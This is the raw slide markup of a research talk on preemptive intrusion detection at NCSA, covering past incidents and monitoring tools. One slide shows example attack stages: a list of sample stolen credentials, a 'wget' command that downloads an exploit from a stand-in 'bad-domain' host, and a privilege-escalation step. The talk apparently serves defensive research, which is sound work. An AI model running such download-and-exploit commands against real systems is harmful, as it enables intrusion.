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4000" cy="13716000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:lvl1pPr algn="ctr" defTabSz="584200">
      <a:defRPr sz="5000">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica Light"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr indent="228600" algn="ctr" defTabSz="584200">
      <a:defRPr sz="5000">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica Light"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr indent="457200" algn="ctr" defTabSz="584200">
      <a:defRPr sz="5000">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica Light"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr indent="685800" algn="ctr" defTabSz="584200">
      <a:defRPr sz="5000">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica Light"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr indent="914400" algn="ctr" defTabSz="584200">
      <a:defRPr sz="5000">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica Light"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr indent="1143000" algn="ctr" defTabSz="584200">
      <a:defRPr sz="5000">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica Light"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr indent="1371600" algn="ctr" defTabSz="584200">
      <a:defRPr sz="5000">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica Light"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr indent="1600200" algn="ctr" defTabSz="584200">
      <a:defRPr sz="5000">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica Light"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr indent="1828800" algn="ctr" defTabSz="584200">
      <a:defRPr sz="50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2944956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>
            <a:lvl1pPr>
              <a:defRPr sz="10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/>
            </a:pPr>
            <a:r>
              <a:rPr sz="10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4387453" y="-1"/>
            <a:ext cx="15609094" cy="2099867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="10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/>
            </a:pPr>
            <a:r>
              <a:rPr sz="10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571809" y="1892783"/>
            <a:ext cx="11428590" cy="114338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200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="38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342900">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3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685800">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="38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indent="1028700">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3800">
                <a:latin typeface="Helvetica Neue Thin"/>
                <a:ea typeface="Helvetica Neue Thin"/>
                <a:cs typeface="Helvetica Neue Thin"/>
                <a:sym typeface="Helvetica Neue Thin"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" indent="1371600">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="38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5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3800" b="1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112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17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1pPr>
      <a:lvl2pPr marL="1061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2pPr>
      <a:lvl3pPr marL="1506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3pPr>
      <a:lvl4pPr marL="1950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4pPr>
      <a:lvl5pPr marL="2395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5pPr>
      <a:lvl6pPr marL="2839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6pPr>
      <a:lvl7pPr marL="3284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7pPr>
      <a:lvl8pPr marL="3728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8pPr>
      <a:lvl9pPr marL="4173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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://server6.bad-domain.com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server6.bad-domain.com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264194" y="225425"/>
            <a:ext cx="24668412" cy="922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l" defTabSz="509411">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:defRPr sz="5500">
                <a:solidFill>
                  <a:srgbClr val="142958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500">
                <a:solidFill>
                  <a:srgbClr val="142958"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preemptive Intrusion Detection: Theoretical Framework and Real-world Measurements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1531320"/>
            <a:ext cx="3010347" cy="7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l" defTabSz="509411">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="002452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002452"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phuong Cao</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317500" y="2264777"/>
            <a:ext cx="5361087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l" defTabSz="509411">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="002452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452"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PI: Ravishankar K. Iyer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="image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0881" y="5893122"/>
            <a:ext cx="24505762" cy="3643192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-2034" y="9779872"/>
            <a:ext cx="24388068" cy="3929808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EE501E"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" dist="127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-2035" y="9556790"/>
            <a:ext cx="24388069" cy="202606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  <a:effectLst>
            <a:outerShdw blurRad="63500" dist="127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8" name="image2.pdf"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect t="80144"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-814185" y="12489018"/>
            <a:ext cx="26530906" cy="17559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660822" y="-673100"/>
            <a:ext cx="21062356" cy="2099866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 lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="7200"/>
              <a:t>Background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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23933125" y="13175654"/>
            <a:ext cx="325091" cy="51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fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr sz="2400" b="1"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="pasted-image.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="6451" t="12902" r="6451" b="9896"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="793799" y="1025048"/>
            <a:ext cx="6057867" cy="5141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asted-image.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect b="53088"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4298999" y="7146019"/>
            <a:ext cx="6057820" cy="5339196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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11583144" y="1321396"/>
            <a:ext cx="12447343" cy="862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509411">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="142958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142958"/>
                </a:solidFill>
              </a:rPr>
              <a:t>National Center for Supercomputing Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Shape 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085859" y="6248106"/>
            <a:ext cx="4655027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Blue Waters building</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4196802" y="12456865"/>
            <a:ext cx="5777757" cy="1108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Five-minute snapshot of In-and-Out traffic within NCSA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11896773" y="2344179"/>
            <a:ext cx="11820085" cy="10702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1" indent="477610" algn="l" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3848">
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>NCSA infrastructure servers mission-critical research and simulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="477610" algn="l" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="3848"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lvl="1" indent="477610" algn="l" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3848">
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>Attackers target NCSA for its powerful computing infrastructure and valuable data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="477610" algn="l" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="3848"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lvl="1" indent="477610" algn="l" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3848">
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:ea typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
                <a:sym typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>In the past 7 years (2008-2014), more than 160 incidents were observed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1168541" lvl="3" indent="-475121" algn="l" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3848">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>Brute-force attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1168541" lvl="3" indent="-475121" algn="l" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3848">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>Credential compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1168541" lvl="3" indent="-475121" algn="l" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3848">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>Application compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1168541" lvl="3" indent="-475121" algn="l" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3848">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>Abusing computing infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1168541" lvl="3" indent="-475121" algn="l" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3848">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>Send spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1168541" lvl="3" indent="-475121" algn="l" defTabSz="303783">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3848">
                <a:latin typeface="Helvetica Neue Light"/>
                <a:ea typeface="Helvetica Neue Light"/>
                <a:cs typeface="Helvetica Neue Light"/>
                <a:sym typeface="Helvetica Neue Light"/>
              </a:rPr>
              <a:t>Launch Denial of Service attacks.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39951" y="2628677"/>
            <a:ext cx="1709698" cy="1041623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-2560937" y="11449694"/>
            <a:ext cx="7726839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Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51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11982" y="-5920826"/>
            <a:ext cx="5461001" cy="4102101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21237485" y="7198788"/>
            <a:ext cx="1314630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NCSA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53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464" y="9664622"/>
            <a:ext cx="1821139" cy="1821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8750" y="381309"/>
            <a:ext cx="2067465" cy="2067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75400" y="4876124"/>
            <a:ext cx="2732570" cy="2186057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6646620" y="7055943"/>
            <a:ext cx="2006601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Firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57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6544718" y="7731261"/>
            <a:ext cx="7152915" cy="568786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13271665" y="7185980"/>
            <a:ext cx="2067464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OpenSSH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59" name="pasted-image.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:extLst/>
          </a:blip>
          <a:srcRect b="12103"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="28187933" y="-4121950"/>
            <a:ext cx="2667001" cy="2790727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27928455" y="-1344243"/>
            <a:ext cx="3185957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Honeypot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="pasted-imag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0751800" y="4518873"/>
            <a:ext cx="2006600" cy="2667001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9111990" y="6696340"/>
            <a:ext cx="3970003" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="635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15528801" y="6696340"/>
            <a:ext cx="4826643" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="635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2253990" y="2794000"/>
            <a:ext cx="4406078" cy="2738884"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="635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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="76" name="Group 76"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5576964" y="7479159"/>
            <a:ext cx="18321512" cy="5845996"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="18321510" cy="5845995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="65" name="pasted-image.png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11529" y="3118002"/>
              <a:ext cx="1582297" cy="15822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" name="pasted-image.png"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11">
              <a:extLst/>
            </a:blip>
            <a:srcRect b="50470"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6137193" y="3303940"/>
              <a:ext cx="1701076" cy="15829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7" name="Shape 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="297427" y="4845033"/>
              <a:ext cx="2006601" cy="6254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>
              <a:lvl1pPr>
                <a:defRPr sz="32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/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3200" b="1"/>
                <a:t>Bro IDS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="Shape 68"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5399849" y="4941930"/>
              <a:ext cx="2920882" cy="6254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>
              <a:lvl1pPr>
                <a:defRPr sz="32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/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3200" b="1"/>
                <a:t>Argus netflow</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="Shape 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9973866" y="4971398"/>
              <a:ext cx="4421268" cy="6254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>
              <a:lvl1pPr>
                <a:defRPr sz="32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/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3200" b="1"/>
                <a:t>File Integrity Monitor</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="70" name="pasted-image.png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416551" y="3274472"/>
              <a:ext cx="1701008" cy="17010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" name="pasted-image.png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6048269" y="3399891"/>
              <a:ext cx="1625601" cy="1625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2" name="Shape 72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="15400629" y="4845979"/>
              <a:ext cx="2920882" cy="6254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>
              <a:lvl1pPr>
                <a:defRPr sz="32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/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3200" b="1"/>
                <a:t>Syslog</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="Shape 73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="773067" y="0"/>
              <a:ext cx="1731336" cy="2701023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 flipV="1">
              <a:off x="16281482" y="168540"/>
              <a:ext cx="1159176" cy="3035643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0" y="2720550"/>
              <a:ext cx="18212991" cy="3125446"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="51A7F9">
                <a:alpha val="11655"/>
              </a:srgbClr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77" name="Shape 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-603798" y="2156194"/>
            <a:ext cx="4655027" cy="62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200" b="1"/>
              <a:t>Legitimate Users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Shape 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2412277" y="6521128"/>
            <a:ext cx="4342105" cy="4342105"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="635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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="81" name="Group 81"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3416300" y="2540099"/>
            <a:ext cx="3082610" cy="901601"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3082609" cy="901600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="79" name="pasted-image.png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0" y="0"/>
              <a:ext cx="901601" cy="901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0" name="Shape 80"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="957344" y="55413"/>
              <a:ext cx="2125266" cy="790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l" defTabSz="509411">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" i="1">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>alice</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1600">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1600" b="1">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>password123</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l" defTabSz="509411">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" i="1">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>bob</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1600">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1600" b="1">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>password456</a:t>
              </a:r>
              <a:endParaRPr sz="16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 defTabSz="509411">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>…</a:t>
              </a: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5407767" y="4197767"/>
            <a:ext cx="5507080" cy="2264084"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5507079" cy="2264082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="82" name="Shape 82"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="36256" y="656542"/>
              <a:ext cx="5470824" cy="1607541"/>
            </a:xfrm>
            <a:prstGeom prst="rect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l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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$ wget </a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2400" u="sng">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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  <a:hlinkClick r:id="rId15"/>
                </a:rPr>
                <a:t>server6.bad-domain.com</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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/vm.c</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:endParaRPr sz="2400"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endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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Connecting to xx.yy.zz.tt:80… connected.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF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HTTP 1.1 GET /vm.c 200 OK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="83" name="Shape 83"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5139147" cy="574675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BD5B0C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l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="28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3. Download exploit (</a:t>
              </a:r>
              <a:r>
                <a:rPr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CVE-200806</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="28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)</a:t>
              </a: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9028974" y="32276"/>
            <a:ext cx="5274452" cy="3737284"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5274450" cy="3737282"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85" name="Shape 85"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="19915" y="0"/>
              <a:ext cx="5234620" cy="574675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="861001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28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FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>4.  Escalate privilege</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="Shape 86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="656542"/>
              <a:ext cx="5274451" cy="3080741"/>
            </a:xfrm>
            <a:prstGeom prst="rect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l">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2400">
